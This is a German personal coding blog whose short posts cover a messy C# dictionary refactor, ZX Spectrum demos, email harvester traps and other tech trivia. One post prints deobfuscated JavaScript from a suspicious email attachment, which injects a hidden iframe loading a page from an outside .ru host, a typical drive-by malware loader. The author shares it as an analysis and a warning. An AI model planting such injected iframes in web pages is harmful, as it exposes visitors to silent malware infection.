Kleine Plauderei aus dem beruflichen Nähkästchen eines leicht gefrusteten Coders. Normale Menschen klicken bitte weiter, hier gibt es nichts zu sehen.

In meiner Tätigkeit als Codemonkey kommen mir ja immer wieder befremdliche Dinge unter, die irgendwelche anderen Codeäffchen zusammengetippselt haben. Und manchmal reicht ein einzelner Facepalm nicht mehr aus, da der fail einfach zu epic ist. So auch heute, als ich über folgendes Lehrbuchbeispiel für Security by Obscurity gestoßen bin:

Aufgabenstellung: Der Anwender soll ein paar Daten in eine Tabelle klopfen, aus diesen Daten werden dann über einen Template-Mechanismus XML-Dateien erzeugt. Echt kein Hexenwerk. So sieht das aus:

Nun müssen also die eingebenen Daten irgendwie weiter gereicht werden, um von einer anderen Klasse verarbeitet zu werden.

Der Typ, der hier am Werk war, hat sich jetzt Dictionaries zusammengebaut, mit dem Attributnamen als Key. Soweit gehe ich d'accord. Anstatt nun aber ganz simpel die Werte als Strings abzulegen, hat der Typ Windows.System.Form.Textboxes genommen!! WTF? Und nicht genug damit! Nein, nein. Erst sammelt er sich nämlich die "Invarianten" und die "Varianten" Daten in 2 unterschiedlichen Dictionaries, nur um die dann mitten im Aufruf der verarbeitenden Methode zu einem einzigen Dictionary zusammen zu mergen. Das gibt dann sowas:

count = KLASSE.Do(actionName,
new Dictionary().Union(variantDataGridLinkedBox).ToDictionary(pair => pair.Key, pair => pair.Value).Union(invariantDataGridLinkedBox).ToDictionary(pair => pair.Key, pair => pair.Value));


Hö hö... höhöhö.... mwahahhaa... WAAAHAHAAAAA

Geht's bitte noch umständlicher? Klar! Er initialisiert sich nämlich diese Dictionaries vorher auch noch super hirnverbrannt mit diversen Loops, in denen er dann erstmal leere Textboxen erzeugt(!) um nachher was zu haben, wo er seine Daten dann reinschreiben kann! AUA!!!

Ich also alles rausgeworfen inklusive Initialisierungsfunktionen. Die Daten werden jetzt just-in-time eingesammelt, in ein einfaches Dictionary aus Strings gesteckt und der gleiche Aufruf sieht nachher so aus:

count = KLASSE.Do(actionName,dataToWrite);

ja, zugegeben, das sieht nicht so sophisticated aus. Aber ich kann danach wenigstens wieder ohne Knoten im Hirn ins Bett gehen.

Jetzt geht's ab! Ich habe gerade eine super obskure Mail erhalten, die als Attachment eine HTML-Seite mit ganz derbe enrcyptetem Javascript-Code enthielt.

Coderfreaks da draußen: hat eine/r von euch Zeit, Muße und ausreichend Expertise um mir zu verraten, was dieser Code macht?

Die komplette Mail gibt es hier als ZIP-File, der interessante JS-Code sieht so aus:

2. Update: Hier war nun der Code abgedruckt. Allerdings blocken manche Virenscanncer (z.B. AVAST) dann komplett den Zugriff auf mein Blog, deshalb musste ich den Code leider entfernen...

Disclaimer: ich hafte weder für Schäden noch für sonstige Unbill, die durch unsachgemäße Handhabung mit der Mail und/oder oben stehendem Code entstehen könnten. Der Code ist NICHT von mir, ich bin selbst nur ein potentielles Opfer. Noobs und Computerunversteher seien hiermit ausdrücklich gewarnt, mit dem Code herum zu experimentieren oder auf oben stehenden Link zu klicken.

1. Update: Hab selber Muße. Also. Der Code ist natürlich nicht wirklich encrypted sondern irgendwie bitgeshiftet oder was weiß denn ich wie das heißt. Lesbar wird daraus:

if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write(""); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://gorysevera.ru:8080/forum/showthread.php?page=5fa58bce769e5c2c');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }

und ich will gar nicht wissen, was uns auf http://gorysevera.ru:8080/forum/showthread.php erwartet...

Ich schlage mich auf Arbeit gerade mit einer ziemlich fehlerhaften Installation eines extrem umfangreichen Programms herum. Dabei ging die Installation eines Windows-Services schief. Der versucht jetzt, eine EXE von einem Ort zu starten, die es dort gar nicht gibt. Ich würde also gerne den Pfad zu dieser EXE umbiegen.

Ganz einfach. In der Registry unter

den ImagePath anpassen.

(gefunden bei chitgoks)

Traumwerk von triebkraft und 4th Dimension

Moss meinte vor ein paar Tagen, er würde sich über eine Liste guter ZX Spectrum Demos freuen und da ich für meine 3 Leser und die eine -in bekanntlich alles tue, habe ich ihm und euch drei ander/inne/n ein paar Perlen aus dem Netz gefischt.

Hardcorenerds schauen sich die Demos (am Besten) auf einem echten ZX Spectrum oder einer Emulatorin an, die weniger computeraffine Leserschaft muss leider mit einem YouTube-Video Vorlieb nehmen. Sämtliche Links führen zu pouet.net, dem One-Shop-Non-Stop-Hoppitybop-Demo-über-Outlet mit dem Glöp.

Der Speccy ist mit seinen rasanten 3,5 MHz zwar satte 250% schneller als ein C64, wirkt aber durch seine total seltsamen Grafik-"fähigkeiten" (Stichwort: Colourclash) bei farbigen Animationen arg gehandicappt.

Wer überhaupt keine Vorstellung davon hat, wieviel Können und Trickserei in diesen Kunstwerken steckt mag vielleicht geneigt sein, die gezeigten Demos miteinander zu vergleichen. Davon möchte ich jedoch dringend abraten, denn die zeitliche Komponente spielt hier - wie überall - eine entscheidende Rolle. Im Laufe der Zeit wurden Demos immer ausgefeilter und wilder, vergleichbar etwa mit den Verbesserungen und Neuerungen beim Kinofilm. Metropolis sieht im Vergleich zu Matrix natürlich alt aus, dadurch wird seine Brillianz jedoch in keinster Weise geschmälert. Auch bei den Demos beeinfluss(t)en ältere Machwerke die neueren, habt bitte mit den Frühwerken ein wenig Nachsicht

Erschwerend kommt hinzu, dass die fiesen Russen bekanntlich nach den gemeinen Chinesen die Überpiraten schlechthin sind und so gibt es inzwischen diverse russische ZX Spectrum Klone, die zum Teil krass beschleunigt laufen und mit neuartigen Funktionalitäten glänzen und so jeden Originalspectrum Staub fressen lassen, was einen Vergleich selbst von Demos aus dem selben Jahr schwer macht. Als wäre das noch nicht genug sind Demos auf YouTube sowieso fürn Arsch, weil weder Framerate noch Auflösung zusammenpassen und MPEG die schönen cleanen Pixel meistens komplett vermatscht. Ihr seht, Computerkrams ist kompliziert und ich halt jetzt endlich die Klappe.

Wer gleich die volle Dröhnung will, hüpft nach dem ersten Video direkt runter zu 2011.

und wer mehr davon will, schaut sich mal diesen YT-Kanal an.

Mehr gibt's nach dem Klick: (mehr …)

Ich werde ab Mittwoch in den Genuss einer ASP.NET-Schulung kommen. Zu diesem Behufe wurde mir der Klotz "ASP.NET 4.0" von Dr. Holger Schwichtenberg ans Herz gelegt. Das liegt gerade auf meinem Schreibtisch und bringt mich zum Schmunzeln:

Hoffentlich ist der Inhalt nicht so meh

Kaum bin ich wieder da, erwischt mich schon 'ne Sommergrippe Trotzdem wollte ich mir diese wunderhübsche Nachricht ins Blog pappen: Studenten aus Texas ist es gelungen, einen Heli-Roboter, der eigentlich auf der Stelle fliegen sollte, durch Manipulation der GPS-Signale mehrfach vom "Kurs" abzulenken. Das macht mir Hoffnung.

Und jetzt wieder ab in die Heia.

Wer mal einen tieferen Einblick in die Programmierung eines 3D-Shooters bekommen will, kann sich dieses Codereview des Doom3-Source-Codes reinziehen.

Ich weiß nicht, ob ihr wisst, was eine Computerdemo ist. Das kann ich auch nur schwer erklären und die deutsche Wikipedia hat leider nichts Griffiges dazu parat. Audiovisuelle Echtzeit-Computerkunst trifft's wohl am Ehesten. Schaut euch mal das Video im Vollbild (!) an und versucht euch dabei zu vergegenwärtigen, dass ihr

a.) nur Buchstaben seht und
b.) alles was ihr seht in eben diesem Moment berechnet wird.

Damit habt ihr schon zwei wichtige Element von Demos kennengelernt nämlich, dass

a.) mit beschränkten Mitteln Dinge getan werden, die über die gesteckten Grenzen (scheinbar) hinausgehen und
b.) alles in Echtzeit berechnet wird

Eigentlich sind Erklärungen auch völlig unnötig. Genießt einfach die Show und wenn ihr Gefallen daran findet, schaut euch ruhig noch ein paar related Videos an. Für Kenner sag' ich jetzt noch Plasma, 3D-Engine, Dithering, Fraczoom und ASCII-Schnee. Yay

http://aa-project.sourceforge.net/

Three goals of AA-Project:

Port all important software (like Doom, Second Reality, X windows etc..) on AA-lib.
Port AA-lib on all available platforms (mainly ZX-Spectrum and Sharp).
Force IBM to start manufacturing MDA cards again.

ASCII-Art | demoscene

Das kapieren jetzt nur Coder, macht aber nichts. Ihr kennt das: zigmal am Tag sollt ihr euch sinnvolle Nachrichten für Eincheck-Vorgänge eures Versionierungstools ausdenken. Lesen tut das alles später eh keine Sau, ne? Genau! Und deshalb gibt es unter

jetzt einen Commit-Spruch-Generator, der euch die lästige Tippselei abnimmt

(\ /)
(O.o)
(> <) Bunny approves these changes.

(danke seilinho!)

Ich habe keinen Epson Drucker, kann mal jemand den nachfolgenden Tipp bestätigen? ((HP-Partonen zu resetten ist irgendwie aufwendiger)

(mehr …)

Vor ungefähr 128 Jahren besaß ich einen Computer namens Sinclair ZX Spectrum mit 48kB RAM Hauptspeicher, einer Auflösung von 256x192 Pixeln und der sagenhaften Geschwindigkeit von 3.5 MHz. Das waren noch Zeiten, will sagen: Opa erzählt vom Krieg

An Ostern sollen ja schon einmal Tote wiederauferstanden sein und so packte mich der Drang auszuprobieren, ob ich Wurli auf den Speccy portiert bekäme. Da ich für Assembler zu doof bin, musste BASIC dafür herhalten und naja... eine Erfolgsgeschichte sieht anders aus.

Damit euch nicht das Gesicht einschläft, habe ich beim Laden die Emulator-Geschwindigkeit auf 200%, für Wurli selbst sogar auf 500% raufgedreht. Kekse gibt's nicht, sonst hätte ich die Geschwindigkeit wohl auf 10.000% raufdrehen müssen... Asche auf mein Haupt. Den Quelltext gibt's ab 0:27 zu sehen. Wer meint, das besser hinzubekommen, ist herzlich eingeladen das zu tun. Hier ist der Code als .tzx-File.

Eigentlich wollte ich hier nur das Zitat

On this page you find various email-addresses,
some are crippled and others are hidden hidden.

verlinken. Damit wäre ich jedoch eventuell das Risiko eingegangen, eine/n Leser\in in völlige Verständnislosigkeit zu stürzen, was ich selbstverständlich unter allen Umständen zu vermeiden suche. Also verliere ich schnell ein paar Worte dazu.

Spam. Wir alle kennen ihn, wir alle kriegen ihn. Mal mehr, mal weniger. Wie kommen diese Spam-Spacken nur immer an unsere Mailadressen? Die Antwort auf diese Frage nennt sich Harvester. So werden Programme bezeichnet, die mehr oder weniger autonom durchs Netz krabbeln und Webseiten nach Mail-Adressen "abgrasen" (engl: to harvest = ernten). Selbst verschleierte Adressen wie "haha (at) lol (dot) com" werden von manchen Harvestern erkannt.

Der CCC hat eine Methode entwickelt, den Spieß umzudrehen und seinerseits Informationen über die Harvester zu ergattern. SCHNUCKI bietet den Harvestern bei jedem Aufruf der Seite neu generierte Mail-Adressen an und codiert dabei in jede Adresse folgende Informationen: IP-Adresse, exaktes Datum mit Uhrzeit sowie die Verschleierungsmethode, die angewandt wurde, um die jeweilige Adresse zu generieren. Könnt ihr mir noch folgen? Das liest sich dann beispielsweise so:

mdbmeeeomfoalemf-ldcccc@schnucki.koeln.ccc.de

Diese Mailadresse existiert nur für mich ganz alleine und sollte ich auf die Idee kommen, dem CCC an diese Adresse Spam zu schicken, könnten daraus Rückschlüsse auf meine Intelligenz gezogen werden. Oder so. Aaaah yes, the wonderful world of science.

Seit ich 2 Monitore an meine ATI 4650 angeschlossen hatte, flackerte der 2. Monitor. Ziemlich unerträglich sogar. Das scheint jetzt vorbei zu sein! Und das kam so.

(mehr …)